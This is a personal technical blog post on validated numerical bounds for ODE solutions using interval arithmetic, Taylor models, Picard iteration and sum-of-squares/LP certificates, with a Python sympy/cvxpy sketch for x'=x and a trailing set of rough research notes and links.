= Student("Kelly", 16) # call instance method kelly.show() Output: First Student Name: Jessa Age: 14 Second Student Name: Kelly Age: 16 Note: Inside any instance method, we can use self to access any data or method that reside in our class. We are unable to access it without a self parameter. An instance method can freely access attributes and even modify the value of attributes of an object by using the self parameter. By Using self.__class__ attribute we can access the class attributes and change the class state. Therefore instance method gives us control of changing the object as well as the class state. Modify Instance Variables inside Instance Method Let’s create the instance method update() method to modify the student age and roll number when student data details change. class Student: def __init__(self, roll_no, name, age): # Instance variable self.roll_no = roll_no self.name = name self.age = age # instance method access instance variable def show(self): print('Roll Number:', self.roll_no, 'Name:', self.name, 'Age:', self.age) # instance method to modify instance variable def update(self, roll_number, age): self.roll_no = roll_number self.age = age # create object print('class VIII') stud = Student(20, "Emma", 14) # call instance method stud.show() # Modify instance variables print('class IX') stud.update(35, 15) stud.show() Output: class VIII Roll Number: 20 Name: Emma Age: 14 class IX Roll Number: 35 Name: Emma Age: 15 Create Instance Variables in Instance Method Till the time we used constructor to create instance attributes. But, instance attributes are not specific only to the __init__() method; they can be defined elsewhere in the class. So, let’s see how to create an instance variable inside the method. Example: class Student: def __init__(self, roll_no, name, age): # Instance variable self.roll_no = roll_no self.name = name self.age = age # instance method to add instance variable def add_marks(self, marks): # add new attribute to current object self.marks = marks # create object stud = Student(20, "Emma", 14) # call instance method stud.add_marks(75) # display object print('Roll Number:', stud.roll_no, 'Name:', stud.name, 'Age:', stud.age, 'Marks:', stud.marks) Output: Roll Number: 20 Name: Emma Age: 14 Marks: 75 Dynamically Add Instance Method to a Object Usually, we add methods to a class body when defining a class. However, Python is a dynamic language that allows us to add or delete instance methods at runtime. Therefore, it is helpful in the following scenarios. - When class is in a different file, and you don’t have access to modify the class structure - You wanted to extend the class functionality without changing its basic structure because many systems use the same structure. Let’s see how to add an instance method in the Student class at runtime. Example: We should add a method to the object, so other instances don’t have access to that method. We use the types module’s MethodType() to add a method to an object. Below is the simplest way to method to an object. import types class Student: # constructor def __init__(self, name, age): self.name = name self.age = age # instance method def show(self): print('Name:', self.name, 'Age:', self.age) # create new method def welcome(self): print("Hello", self.name, "Welcome to Class IX") # create object s1 = Student("Jessa", 15) # Add instance method to object s1.welcome = types.MethodType(welcome, s1) s1.show() # call newly added method s1.welcome() Output: Name: Jessa Age: 15 Hello Jessa Welcome to Class IX Dynamically Delete Instance Methods We can dynamically delete the instance method from the class. In Python, there are two ways to delete method: - By using the deloperator - By using delattr()method By using the del operator The del operator removes the instance method added by class. Example: In this example, we will delete an instance method named percentage() from a Student class. If you try to access it after removing it, you’ll get an Attribute Error. class Student: # constructor def __init__(self, name, age): self.name = name self.age = age # instance method def show(self): print('Name:', self.name, 'Age:', self.age) # instance method def percentage(self, sub1, sub2): print('Percentage:', (sub1 + sub2) / 2) emma = Student('Emma', 14) emma.show() emma.percentage(67, 62) # Delete the method from class using del operator del emma.percentage # Again calling percentage() method # It will raise error emma.percentage(67, 62) Output: Name: Emma Age: 14 Percentage: 64.5 File "/demos/oop/delete_method.py", line 21, in <module> del emma.percentage AttributeError: percentage By using the delattr() method The delattr() is used to delete the named attribute from the object with the prior permission of the object. Use the following syntax to delete the instance method. delattr(object, name) object: the object whose attribute we want to delete. name: the name of the instance method you want to delete from the object. Example: In this example, we will delete an instance method named percentage() from a Student class. emma = Student('Emma', 14) emma.show() emma.percentage(67, 62) # delete instance method percentage() using delattr() delattr(emma, 'percentage') emma.show() # Again calling percentage() method # It will raise error emma.percentage(67, 62)
https://pynative.com/python-instance-methods/
CC-MAIN-2021-39
refinedweb
1,431
67.86
how can I convert a variable of type template to an integer?? You can't. templates take on a data type when they are declared. For example vector<int> list; is a vector of integers. Once declared it can not be changed to a vector of strings or something else. vector<int> list; But then again, maybe I misunderstood the question. Post an example of what you want to do All I want is to convert the elem to an ASCII code and elem maybe of any data type template<typename T> int h(T elem,int size){ int i; int n=(int)elem i=n%size; return i; } That makes no sense. If T is type double how is the function supposed to convert the double to a single ascii character??? Um, presumably by taking the modulo of the integer part against parameter size , which would presumably be 256 in this case? ;) size Not saying it makes much sense, still, but it should "work".... And to the OP, you already have code, what seems to be the problem? >> which would presumably be 256 in this case? why 256? sizeof(double) != 256, so where did you get that number? @OP you want this I think: template<typename R, typename T> R cast(const T& input){ stringstream stream; stream << input; R ret = R(); stream >> ret; return ret; } int main(){ int i = cast<int>("12345"); float pi = cast<int>("3.1415"); } It has nothing to do with the magnitude of the double, or the memory allocated to store it. I'm assuming the OP is taking the modulo of (int)(original_value) % size to limit the range of output values. 256 would be the max-value-plus-one of an 8-bit ASCII value the OP was hoping to convert to.... Or he could use 128 instead to get a 7-bit ASCII result. For what it's worth.... Minimally related, the integer portions of large float/double values can't be represented by the int type. My test here returns INT_MIN (from limits.h) for float f = 3e12; int i = int(f); float f = 3e12; int i = int(f); Thanks all, but I'm still have the same problem I'm implementing now hash table, and I asked this question to get the has function for each element in file. and to get the hash function, I must get the a specific number for each element and then divides it by n. so How can I get this number. any Help will be appreciated. Now that we know what you're actually trying to accomplish, let me google that for you: Here's an example of how you can split the key in bytes and then use them to calculate the hash value, provided that the key is a primitive or a POD: #include <iostream> template <class T> uint32_t hash(const T & key, uint32_t key_size, uint32_t table_size) { const uint8_t * bytes = reinterpret_cast<const uint8_t *>(&key); uint32_t hash_value = 0; for (uint32_t i = 0; i < key_size; i++) { hash_value += bytes[i] << (i % 16); hash_value += bytes[i] << ((key_size - i) % 16); } return hash_value % table_size; } int main() { const uint32_t table_size = 19; std::cout << hash("hello, world!", 13 * sizeof(char), table_size) << std::endl; std::cout << hash("hello, again!", 13 * sizeof(char), table_size) << std::endl; std::cout << hash(23, sizeof(int), table_size) << std::endl; std::cout << hash(44, sizeof(int), table_size) << std::endl; std::cout << hash(67, sizeof(int), table_size) << std::endl; std::cout << hash(5.5, sizeof(double), table_size) << std::endl; std::cout << hash(2.7, sizeof(double), table_size) << std::endl; std::cout << hash(3.4, sizeof(double), table_size) << std::endl; return 0; } Edited 5 Years Ago by m4ster_r0shi: n/a A somewhat better hash function: //... for (uint32_t i = 0; i < key_size; i++) { hash_value += bytes[i] << ( 23 * i % 24 ); hash_value += bytes[i] << ( 23 * (key_size - i) % 24 ); } //... What's this thing with the 30 minute limit to editing?... -.- ...
https://www.daniweb.com/programming/software-development/threads/367883/convert-template-to-int
CC-MAIN-2017-09
refinedweb
647
70.33
The Definitive Guide to WSGI Python has a number of different frameworks for building web applications. The choice of framework limits the choice of available web servers. Java also has a number of web frameworks but they are all based on the common servlet API which means that any framework can run on any web server which supports the servlet API. You’ve probably seen WSGI mentioned before, but you might not be exactly sure what it meant or did. In this post, you will learn to write your own WSGI application and a basic WSGI server, too! Let’s get started! (The dry technical details of WSGI are defined in PEP 333 and extended with PEP 3333 to improve string handling in Python 3.) PS: The code for this project can be found on GitHub if you’d like to check it out Prerequisites to Building a WSGI Application First things first, if you don’t already have Python installed on your computer, you will need to install a recent version of Python 3. Next, you need to install the Tornado library (which will be used to run the WSGI application): pip install tornado Finally, create a project directory where all of our future code will live: mkdir ~/wsgi cd ~/wsgi How to Build a Simple WSGI Application We will start by creating the simplest WSGI application running in a Tornado server. Create a file called simple.py containing the following Python code: from tornado. import HTTPServer from tornado.ioloop import IOLoop from tornado.wsgi import WSGIContainer def application(environ, start_response): status = '200 OK' response_headers = [('Content-type', 'text/plain')] start_response(status, response_headers) return [b"Welcome to WSGI!\n"] container = WSGIContainer(application) server = HTTPServer(container) server.listen(8080) print("Listening") IOLoop.current().start() Let’s explain what this code does. It is necessary to import any external packages so that Python can find the code. We could have simply used import tornado.ioloop but then later would have had to use tornado.web.IOLoop in the code. Using the from form of import means that we can just use IOLoop. The function application implements WSGI. PEP 3333 refers to it as the application object. It has two parameters that are required by the WSGI server interface. These parameters are passed by the WGSI server implementation—in this case, the WSGIContainer. The first parameter environ is a dictionary that contains environment variables that must be present. They must include environment variables defined by the Common Gateway Interface (CGI) specification. It may contain environment variables from the operating system. It must also contain WSGI-defined variables. These environment variables are listed in the PEP 3333 document. The second parameter start_response is a function that must be called by the application function on each request. start_response takes two parameters, the response status code and a list of response headers. Each list element represents a header and is a tuple containing the header name and the header value. In the example above, the list contains one element that represents the Content-Type header: [('Content-type', 'text/plain')] The application object needs to define the HTTP response. It defines the status code which is a string containing a three-digit number and a message. It also needs to define any response headers in the form of a list of tuples. It then calls the start_response function passing it the status and headers. It then returns the response body. It must be of the Python type bytes, hence the b in front of the string. Finally, we need to create a server—a Tornado WSGIContainer object which takes the WSGI function as a parameter. We then construct the HTTPServer object passing it to the WSGI container. We then need to tell the application which port to listen on, in this case, port 8080. The last line starts an IOLoop which will start listening on port 8080 and pass requests to the handler class instances. The server can now be run using: python simple.py The server can be tested by pointing a web browser at or using the curl command. The welcome message should be displayed. curl The server can be stopped by typing Control-C. Python will complain about being interrupted but this can be ignored. How to Create a Python Package Containing a WSGI Application A Python package is simply a directory containing Python files. We are going to create a package called server which needs to be in a directory of the same name. mkdir server The Python package plumbing requires a file called __init__.py which is executed whenever the package is imported. It can be an empty file. touch server/__init__.py A WSGI application can also be implemented as a class. Create the file server/Application.py containing the following Python code: class Application: def __init__(self, environ, start_response): self.environ = environ self.start = start_response def __iter__(self): status = "200 OK" headers = [("Content-type", "text/plain")] self.start(status, headers) for chunk in [b"Welcome" b" " b"to" b" " b"WSGI!\n"]: yield chunk Like the application function we wrote above, the constructor __init__ must have the two parameters that are required by the WSGI server interface. In our example, these are saved as class attributes. The class also needs to have an iterator method called __iter__, which at some point must call the “start_response” function that was passed to the constructor. The __iter__ method must also yield responses—as the “bytes” type and not the “str” type you might expect . Note that __iter__ is a generator. This is why the keyword yield is used in place of return. Tersely put, __iter__ is a generator that yields bytes. The generator is used because the response body could be a large object such as a video. This allows the server to start sending content immediately, instead of waiting until everything is loaded. If a package contains a file called __main__.py it becomes the entry point for the module and allows the package to be run without specifying any Python files. Create a file called server/__main__.py with the following content: from tornado. import HTTPServer from tornado.ioloop import IOLoop from tornado.options import define, options from tornado.wsgi import WSGIContainer from .Application import Application define("port", default=8080, help="Listener port") options.parse_command_line() container = WSGIContainer(Application) server = HTTPServer(container) server.listen(options.port) print("Listening on port", options.port) IOLoop.current().start() This is similar to the earlier code, except that the class is passed to the WSGI container in place of the function. It is bad practice to hard code the port number. Tornado provides an options package that allows command-line options to be defined and processed. A port option is defined which has a default value of 8080. It can be changed to port 80 on the command line using the --port=80 option. The server can be run specifying the port number to use. python -m server --port=8080 The program can be tested using curl, the -i option prints out the response headers. curl -i Understanding the WSGI Environment The WSGI environment dictionary contains the information required to process requests. We will copy server/Application.py to server/Environment.py while also renaming the “Application” class to “Environment” cat server/Application.py | sed 's/Application/Environment/' > server/Environment.py Next we will modify the iterator method in server/Environment.py to return the contents of the dictionary: def __iter__(self): status = "200 OK" headers = [("Content-type", "text/plain")] self.start(status, headers) for key, value in sorted(self.environ.items()): yield f"{key}: {value}\n".encode() We also need to change Application to Environment in server/__main__.py so that it looks like this: from tornado. import HTTPServer from tornado.ioloop import IOLoop from tornado.options import define, options from tornado.wsgi import WSGIContainer from .Environment import Environment define("port", default=8080, help="Listener port") options.parse_command_line() container = WSGIContainer(Environment) server = HTTPServer(container) server.listen(options.port) print("Listening on port", options.port) IOLoop.current().start() Run the server and then use curl to send a GET request. curl The contents of the dictionary are: HTTP_ACCEPT: */* HTTP_HOST: localhost:8080 HTTP_USER_AGENT: curl/7.64.1 PATH_INFO: /example QUERY_STRING: user=Joe REMOTE_ADDR: ::1 REQUEST_METHOD: GET SCRIPT_NAME: SERVER_NAME: localhost SERVER_PORT: 8080 SERVER_PROTOCOL: HTTP/1.1 wsgi.errors: <_io.TextIOWrapper wsgi.input: <_io.BytesIO object at 0x1077d36d0> wsgi.multiprocess: True wsgi.multithread: False wsgi.run_once: False wsgi.url_scheme: http wsgi.version: (1, 0) The request method is in the environment variable REQUEST_METHOD. You can find the components of the URL in the environment variables wsgi.url_scheme, HTTP_HOST, PATH_INFO, and QUERY_STRING. Now use curl to send a POST request. curl -i -X POST -d "email=michelle@example.com&password=abcd1234" The contents of the dictionary are: CONTENT_LENGTH: 44 CONTENT_TYPE: application/x-www-form-urlencoded HTTP_ACCEPT: */* HTTP_HOST: localhost:8080 HTTP_USER_AGENT: curl/7.64.1 PATH_INFO: /login QUERY_STRING: REMOTE_ADDR: ::1 REQUEST_METHOD: POST SCRIPT_NAME: SERVER_NAME: localhost SERVER_PORT: 8080 SERVER_PROTOCOL: HTTP/1.1 wsgi.errors: <_io.TextIOWrapper wsgi.input: <_io.BytesIO object at 0x1042f5450> wsgi.multiprocess: True wsgi.multithread: False wsgi.run_once: False wsgi.url_scheme: http wsgi.version: (1, 0) The POST request sent parameters in the HTTP request body. This added the environment variables CONTENT_LENGTH and CONTENT_TYPE. The request body is contained in the environment variable wsgi.input which is a byte stream. This can be displayed by decoding the byte stream. def __iter__(self): status = "200 OK" headers = [("Content-type", "text/plain")] self.start(status, headers) for key, value in sorted(self.environ.items()): yield f"{key}: {value}\n".encode() yield self.environ['wsgi.input'].getvalue() yield "\n".encode() The output from the curl request now has the following line: What are WSGI Server Considerations? The Tornado WSGI container runs a single application. It also requires Python code to create the container and the server. A consequence of this is that the application needs to use the request method and the path to decide what content to serve. There is another popular Python webserver called Green Unicorn. It can run Python web applications, including WSGI applications, without any additional code. If the WSGI application is not a function called application then the function or class needs to be specified on the command line after a colon character. Again, it runs a single application. pip install gunicorn gunicorn -b :8080 server.Application:Application A more flexible solution is to use an Apache web server which has the mod_wsgi module installed. This allows URIs to be mapped to WSGI applications. A single server can run multiple applications each one handling a different URI. How to Implement a WSGI Server It may sometimes be necessary to implement the WSGI server side of the interface. A typical use case is writing a middleware layer that needs to perform transformation or forward requests to other servers. In this example, we will implement a server that can redirect requests to different WSGI applications based on the HTTP request method and the URI. Create a file called server/WSGIRunner.py containing the following Python code: import sys from tornado.web import RequestHandler from .Application import Application from .Environment import Environment class WSGIRunner(RequestHandler): headers = [] url_map = { '/': Application, '/env': Environment } def get(self, path): self._set_environment('GET', path) if path in WSGIRunner.url_map: self.run(WSGIRunner.url_map[path]) else: self.send_error(404) def _set_environment(self, method, path): self.environ = { 'wsgi.errors': sys.stderr, 'wsgi.input': sys.stdin.buffer, 'wsgi.multiprocess': True, 'wsgi.multithread': False, 'wsgi.run_once': False, 'wsgi.url_scheme': ' 'wsgi.version': (1, 0), 'HTTP_ACCEPT': self.request.headers['Accept'], 'HTTP_HOST': self.request.headers['Host'], 'HTTP_HTTP_USER_AGENT': self.request.headers['User-Agent'], 'REQUEST_METHOD': method, 'PATH_INFO': path } query = '' for k, v in self.request.arguments.items(): if len(query) > 0: query += '&' query += k + '=' + v[0].decode() self.environ['QUERY_STRING'] = query @staticmethod def start_response(status, response_headers): headers = response_headers def run(self, application): result = application(self.environ, WSGIRunner.start_response) for header in WSGIRunner.headers: self.set_header(header[0], header[1]) for data in result: self.write(data) The class WSGIRunner is a Tornado request handler which implements a get method that has a path parameter containing the request URI. The _set_environment() method is called to create the environment map required by WSGI. The parameters are the request method—in this case, GET and the path. The get method looks up the path in a static dictionary. If the entry exists, the dictionary returns the class containing the WSGI application to run. The run method is called to run the application. If the path is not in the map a 404 not found response is sent using the RequestHandler send_error() method. The start_response() method is the response callback required by the WSGI interface. It has to be a static method. The @staticmethod annotation allows the class to define a static method that does not require a self parameter. The method simply stores the response headers in the static list headers. The run method calls the WSGI application, passing the environment dictionary and the response callback. It then sets the response headers and writes the data returned by the application as the response. Tornado will decode any query string, so it needs to be reconstructed from the request arguments. The file ___main__.py now must be changed to run the WSGIRunner as a Tornado application. from tornado. import HTTPServer from tornado.ioloop import IOLoop from tornado.options import define, options from tornado.web import Application from .WSGIRunner import WSGIRunner define("port", default=8080, help="Listener port") options.parse_command_line() application = Application([("(/.*)", WSGIRunner)]) server = HTTPServer(application) server.listen(options.port) print("Listening on port", options.port) IOLoop.current().start() The Tornado Application gets passed an array of tuples, in this case just one. The tuple contains a URI and a class that handles it. In this case, the URI is a regular expression in parentheses that matches everything. The parentheses cause the URI to be captured and passed as a parameter to the get method. Summing Up WSGI WSGI is an interface specification for Python web applications. It is a low-level interface. Many Python developers build web applications using popular frameworks, such as Flask, Tornado, or Django. If it is unlikely that the web application framework will be changed, the benefits of using the framework APIs outweigh the limitations of WSGI. If, however, the web application is designed to be deployed in different server environments, then WSGI is the only choice as it is a Python standard. The biggest limitation of WSGI is that it needs to implement code conditionally based on the request method and the request URI. It also needs to extract and decode any request parameters from the environment dictionary. These limitations can be overcome by using a standalone server implementation, which can invoke different WSGI applications, depending on the request method and URI. A utility class can decode request parameters and return a dictionary in a more consumable form. To sum it up, while WSGI is a low-level protocol for building web applications in Python, it is often helpful to understand how these things work behind the scenes. While you probably won’t be building any raw WSGI applications, I hope this information will be helpful to you in your web development journey. If you liked this post, be sure to check out some of our other great posts: - Build a Simple CRUD App with Python, Flask, and React - An Illustrated Guide to OAuth and OpenID Connect - What the Heck is OAuth? We are always posting new content. If you liked this post, be sure to follow us on Twitter, subscribe to our YouTube channel, and follow us on Twitch. Okta Developer Blog Comment Policy We welcome relevant and respectful comments. Off-topic comments may be removed.
https://developer.okta.com/blog/2020/11/16/definitive-guide-to-wsgi
CC-MAIN-2022-21
refinedweb
2,623
51.75
KWayland::Client::FakeInput #include <fakeinput.h> Detailed Description Wrapper for the org_kde_kwin_fake_input interface. FakeInput allows to fake input events into the Wayland server. This is a privileged Wayland interface and the Wayland server is allowed to ignore all events. This class provides a convenient wrapper for the org_kde_kwin_fake_input interface. To use this class one needs to interact with the Registry. There are two possible ways to create the FakeInput interface: This creates the FakeInput and sets it up directly. As an alternative this can also be done in a more low level way: The FakeInput can be used as a drop-in replacement for any org_kde_kwin_fake_input pointer as it provides matching cast operators. Definition at line 50 of file fakeinput.h. Constructor & Destructor Documentation Note: after constructing the FakeInput it is not yet valid and one needs to call setup. In order to get a ready to use FakeInput prefer using Registry::createFakeInput. Definition at line 34 of file fakeinput.cpp. Member Function Documentation Authenticate with the Wayland server in order to request sending fake input events. The Wayland server might ignore all requests without a prior authentication. The Wayland server might use the provided applicationName and reason to ask the user whether this request should get authenticated. There is no way for the client to figure out whether the authentication was granted or denied. The client should assume that it wasn't granted. - Parameters - Definition at line 77 of file fakeinput.cpp. Destroys the data held by this FakeInput._fake_input interface once there is a new connection available. This method is automatically invoked when the Registry which created this FakeInput gets destroyed. Definition at line 50 of file fakeinput.cpp. - Returns - The event queue to use for bound proxies. Definition at line 67 of file fakeinput.cpp. - Returns trueif managing a org_kde_kwin_fake_input. Definition at line 55 of file fakeinput.cpp. Releases the org_kde_kwin_fake_input interface. After the interface has been released the FakeInput instance is no longer valid and can be setup with another org_kde_kwin_fake_input interface. Definition at line 45 of file fakeinput.cpp. The corresponding global for this interface on the Registry got removed. This signal gets only emitted if the Compositor got created by Registry::createFakeInput - Since - 5.5 Request a keyboard key press. - Parameters - - Since - 5.63 Definition at line 205 of file fakeinput.cpp. Request a keyboard button release. - Parameters - - Since - 5.63 Definition at line 215 of file fakeinput.cpp. Request a scroll of the pointer axis with delta. Definition at line 157 of file fakeinput.cpp. Convenience overload. Definition at line 145 of file fakeinput.cpp. Requests a pointer button click, that is a press directly followed by a release. - Parameters - Definition at line 151 of file fakeinput.cpp. Convenience overload. Definition at line 123 of file fakeinput.cpp. Request a pointer button press. - Parameters - Definition at line 128 of file fakeinput.cpp. Convenience overload. Definition at line 134 of file fakeinput.cpp. Request a pointer button release. - Parameters - Definition at line 139 of file fakeinput.cpp. Request a relative pointer motion of delta pixels. Definition at line 83 of file fakeinput.cpp. Request an absolute pointer motion to pos position. - Since - 5.54 Definition at line 89 of file fakeinput.cpp. Requests to cancel the current touch event sequence. - Since - 5.23 Definition at line 193 of file fakeinput.cpp. Request a touch down at pos in global coordinates. If this is the first touch down it starts a touch sequence. - Parameters - - See also - requestTouchMotion - requestTouchUp - Since - 5.23 Definition at line 175 of file fakeinput.cpp. Requests a touch frame. This allows to manipulate multiple touch points in one event and notify that the set of touch events for the current frame are finished. - Since - 5.23 Definition at line 199 of file fakeinput.cpp. Request a move of the touch point identified by id to new global pos. - Parameters - - See also - requestTouchDown - Since - 5.23 Definition at line 181 of file fakeinput.cpp. Requests a touch up of the touch point identified by id. - Parameters - - Since - 5.23 Definition at line 187 of file fakeinput.cpp. Sets the queue to use for bound proxies. Definition at line 72 of file fakeinput.cpp. Setup this FakeInput to manage the manager. When using Registry::createFakeInput there is no need to call this method. Definition at line 60 of file fakeinput.
https://api.kde.org/frameworks/kwayland/html/classKWayland_1_1Client_1_1FakeInput.html
CC-MAIN-2020-40
refinedweb
727
61.83
Fiddling around with validated ODE integration, Sum of Squares, Taylor Models. As I have gotten more into the concerns of formal methods, I’ve become unsure that ODEs actually exist. These are concerns that did not bother me much when I defined myself as being more in the physics game. How times change. Here’s a rough cut. A difficulty with ODE error analysis is that it is very confusing how to get the error on something you are having difficulty approximating in the first place. If I wanted to know the error of using a finite step size dt vs a size dt/10, great. Just compute both and compare. However, no amount of this seems to bootstrap you down to the continuum. And so I thought, you’re screwed in regards to using numerics in order to get true hard facts about the true solution. You have to go to paper and pencil considerations of equations and variables and epsilons and deltas and things. It is now clearer to me that this is not true. There is a field of verified/validated numerics. A key piece of this seems to be interval arithmetic. An interval can be concretely represented by its left and right point. If you use rational numbers, you can represent the interval precisely. Interval arithmetic over approximates operations on intervals in such a way as to keep things easily computable. One way it does this is by ignoring dependencies between different terms. Check out Moore et al’s book for more. What switching over to intervals does is you think about sets as the things you’re operating on rather than points. For ODEs (and other things), this shift of perspective is to no longer consider individual functions, but instead sets of functions. And not arbitrary extremely complicated sets, only those which are concretely manipulable and storable on a computer like intervals. Taylor models are a particular choice of function sets. You are manipulating an interval tube around a finite polynomial. If during integration / multiplication you get higher powers, truncate the polynomials by dumping the excess into the interval term. This keeps the complexity under wraps and closes the loop of the descriptive system. If we have an iterative, contractive process for getting better and better solutions of a problem (like a newton method or some iterative linear algebra method), we can get definite bounds on the solution if we can demonstrate that a set maps into itself under this operation. If this is the case and we know there is a unique solution, then it must be in this set. It is wise if at all possible to convert an ODE into integral form. $ \dot{x}= f(x,t)$ is the same as $ x(t) = x_0 + \int f(x,t)dt$. For ODEs, the common example of such an operation is known as Picard iteration. In physical terms, this is something like the impulse approximation / born approximation. One assumes that the ODE evolves according to a known trajectory $ x_0(t)$ as a first approximation. Then one plugs in the trajectory to the equations of motion $ f(x_0,t)$ to determine the “force” it would feel and integrate up all this force. This creates a better approximation $ x_1(t)$ (probably) which you can plug back in to create an even better approximation. If we instead do this iteration on an intervally function set / taylor model thing, and can show that the set maps into itself, we know the true solution lies in this interval. The term to search for is Taylor Models (also some links below). I was tinkering with whether sum of squares optimization might tie in to this. I have not seen SOS used in this context, but it probably has or is worthless. An aspect of sum of squares optimization that I thought was very cool is that it gives you a simple numerical certificate that confirms that at the infinitude of points for which you could evaluate a polynomial, it comes out positive. This is pretty cool. But that isn’t really what makes Sum of squares special. There are other methods by which to do this. There are very related methods called DSOS and SDSOS which are approximations of the SOS method. They replace the SDP constraint at the core with a more restrictive constraint that can be expressed with LP and socp respectively. These methods lose some of the universality of the SOS method and became basis dependent on your choice of polynomials. DSOS in fact is based around the concept of a diagonally dominant matrix, which means that you should know roughly what basis your certificate should be in. This made me realize there is an even more elementary version of DSOS that perhaps should have been obvious to me from the outset. Suppose we have a set of functions we already know are positive everywhere on a domain of interest. A useful example is the raised chebyshev polynomials. The appropriate chebyshev polynomials oscillate between [-1,1] on the interval [-1,1], so if you add 1 to them they are positive over the whole interval [-1,1]. Then nonnegative linear sums of them are also positive. Bing bang boom. And that compiles down into a simple linear program (inequality constraints on the coefficients) with significantly less variables than DSOS. What we are doing is restricting ourselves to completely positive diagonal matrices again, which are of course positive semidefinite. It is less flexible, but it also has more obvious knobs to throw in domain specific knowledge. You can use a significantly over complete basis and finding this basis is where you can insert your prior knowledge. It is not at all clear there is any benefit over interval based methods. Here is a sketch I wrote for $ x’=x$ which has solution $ e^t$. I used raised chebyshev polynomials to enforce positive polynomial constraints and tossed in a little taylor model / interval arithmetic to truncate off the highest terms. I’m using my helper functions for translating between sympy and cvxpy expressions. Sympy is great for collecting up the coefficients on terms and polynomial multiplication integration differentiation etc. I do it by basically creating sympy matrix variables corresponding to cvxpy variables which I compile to cvxpy expressions using lambdify with an explicit variable dictionary. import cvxpy as cvx import numpy as np import sos import sympy as sy import matplotlib.pyplot as plt #raised chebyehve t = sy.symbols("t") N = 5 # seems like even N becomes infeasible. terms = [sy.chebyshevt(n,t) + 1 for n in range(N)] # raised chebyshev functions are positive on interval [-1,1] print(terms) ''' for i in range(1,4): ts = np.linspace(-1,1,100) #print(ts) #rint(sy.lambdify(t,terms[i], 'numpy')(ts)) plt.plot( ts , sy.lambdify(t,terms[i])(ts)) plt.show() ''' vdict = {} l,d = sos.polyvar(terms) # lower bound on solution vdict.update(d) w,d = sos.polyvar(terms, nonneg=True) # width of tube. Width is always positive (nonneg) vdict.update(d) u = l + w # upper curve is higher than lower by width def picard(t,f): return sy.integrate(f, [t,-1,t]) + np.exp(-1) # picard integration on [-1,1] interval with initial cond x(-1)=1/e ui = picard(t,u) li = picard(t,l) c = [] def split(y , N): # split a polynomial into lower an upper parts. yp = sy.poly(y, gens=t) lower = sum([ c*t**p for (p,), c in yp.terms() if p < N]) #upper = sum([ c*x**p for (p,), c in yp.terms() if p > N]) upper = y - lower return lower,upper terms = [sy.chebyshevt(n,t) + 1 for n in range(N+1)] # ui <= u lowerui, upperui = split(ui, N) # need to truncate highest power of u using interval method print(lowerui) print(upperui) du = upperui.subs(t,1) #Is this where the even dependence of N comes from? #c += [ du >= sos.cvxify(upperui.subs(t,1), vdict), du >= sos.cvxify(upperui.subs(t,1)] # , upperui.subs(t,-1)) print(du) lam1,d = sos.polyvar(terms,nonneg=True) # positive polynomial vdict.update(d) # This makes the iterated interval inside the original interval c += sos.poly_eq( lowerui + du + lam1 , u , vdict) # write polynomial inequalities in slack equality form # l <= li # lam2, d = sos.polyvar(terms,nonneg=True) vdict.update(d) c += sos.poly_eq( l + lam2 , li , vdict) # makes new lower bound higher than original lower bound obj = cvx.Minimize( sos.cvxify(w.subs(t ,0.9), vdict) ) # randomly picked reasonable objective. Try minimax? #obj = cvx.Maximize( sos.cvxify(l.subs(t ,1), vdict) ) print(c) prob = cvx.Problem(obj, c) res = prob.solve(verbose=True) #solver=cvx.CBC print(res) lower = sy.lambdify(t, sos.poly_value(l , vdict)) upper = sy.lambdify(t, sos.poly_value(u , vdict)) #plt.plot(ts, upper(ts) - np.exp(ts) ) # plot differences #plt.plot(ts, lower(ts) - np.exp(ts) ) ts = np.linspace(-1,1,100) plt.plot(ts, upper(ts) , label= "upper") plt.plot(ts, lower(ts) , label= "lower") plt.plot(ts, np.exp(ts) , label= "exact") #plt.plot(ts,np.exp(ts) - lower(ts) ) plt.legend() plt.show() ''' if I need to add in interval rounding to get closure is there a point to this? Is it actually simpler in any sense? Collecting up chebyshev compoentns and chebysehv splitting would perform lanczos economization. That'd be coo What about a bvp Get iterative formulation. And what are the requirements 1. We need an iterative contractive operator 2. We need to confirm all functions that forall t, l <= f <= u map to in between li and ui. This part might be challenging 3. Get the interval contracting and small. x <= a y = Lx Lx <= La ? Yes, if positive semi definite. Otherwise we need to split it. No. Nice try. not component wise inequality. Secondary question: finitely confirming a differential operator is positive semi definite forall x, xLx >= 0 ? Similar to the above. Make regions in space. Value function learning is contractive. hmm. Piecewise lyapunov functions Being able to use an LP makes it WAY faster, WAY more stable, and opens up sweet MIPpurtunities. ''' Seems to work, but I’ve been burned before. man, LP solvers are so much better than SDP solvers Random junk and links: Should I be more ashamed of dumps like this? I don’t expect you to read this. Functional analysis by and large analyzes functions by analogy with more familiar properties of finite dimensional vector spaces. In ordinary 2d space, it is convenient to work with rectangular regions or polytopic regions. Suppose I had a damped oscillator converging to some unknown point. If we can show that every point in a set maps within the set, we can show that the function One model of a program is that it is some kind of kooky complicated hyper nonlinear discrete time dynamical system. And vice versa, dynamical systems are continuous time programs. The techniques for analyzing either have analogs in the other domain. Invariants of programs are essential for determining correctness properties of loops. Invariants like energy and momentum are essential for determining what physical systems can and cannot do. Lyapunov functions demonstrate that control systems are converging to the set point. Terminating metrics are showing that loops and recursion must eventually end. If instead you use interval arithmetic for a bound on your solution rather than your best current solution, and if you can show the interval maps inside itself, then you know that the iterative process must converge inside of the interval, hence that is where the true solution lies. A very simple bound for an integral $ \int_a^b f(x)dx$ is $ \int max_{x \in [a,b]}f(x) dx= max_{x \in [a,b]}f(x) \int dx = max_{x \in [a,b]}f(x) (b - a)$ The integral is a very nice operator. The result of the integral is a positive linear sum of the values of a function. This means it plays nice with inequalities. Rigorously Bounding ODE solutions with Sum of Squares optimization - Intervals Intervals - Moore book. Computational functional analaysis. Tucker book. Coqintervals. fixed point theorem. Hardware acceleration? Interval valued functions. Interval extensions. - Banach fixed point - contraction mapping - Brouwer fixed point - Schauder - Knaster Tarski Picard iteration vs? Allowing flex on boundary conditions via an interval? Interval book had an interesting integral form for the 2-D sympy has cool stuff google scholar search z3, sympy brings up interesting things The pydy guy Moore has a lot of good shit. resonance Lyapunov functions. Piecewise affine lyapunov funcions. Are lyapunov functions kind of like a PDE? Value functions are pdes. If the system is piecewise affine we can define a grid on the same piecewise affine thingo. Compositional convexity. Could we use compositional convexity + Relu style piecewise affinity to get complicated lyapunov functions. Lyapunov functions don’t have to be continiuous, they just have to be decreasing. The Lie derivative wrt the flow is always negative, i.e gradeint of function points roughly in direction of flow. trangulate around equilibrium if you want to avoid quadratic lyapunov. For guarded system, can relax lyapunov constrain outside of guard if you tighten inside guard. Ax>= 0 is guard. Its S-procedure. Best piecewise 